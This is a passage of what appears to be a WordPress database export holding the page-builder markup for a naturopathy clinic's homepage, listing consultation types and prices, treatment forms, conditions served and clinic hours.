formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $60\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" title_text=\"5-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Flower essence consult (30 min) - $85\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A consult devoted to your emotional wellbeing. Flower essences are a form of energetic medicine used to assist with working through negative beliefs, stress or trauma. Flower essences are gentle and supportive in nature making them perfect for children too. Consult includes a 25ml customised essence. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & online</span><br /><br /></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9:30am-5:30pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 10am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9:30am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2024-03-13 12:55:37','2024-03-13 04:55:37','',28,'https://verdenaturopathy.com.au/?p=408',0,'revision','',0),(412,1,'2024-07-02 20:42:24','2024-07-02 12:42:24','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (60 min) - $180\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $60\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" title_text=\"5-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Flower essence consult (30 min) - $85\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" 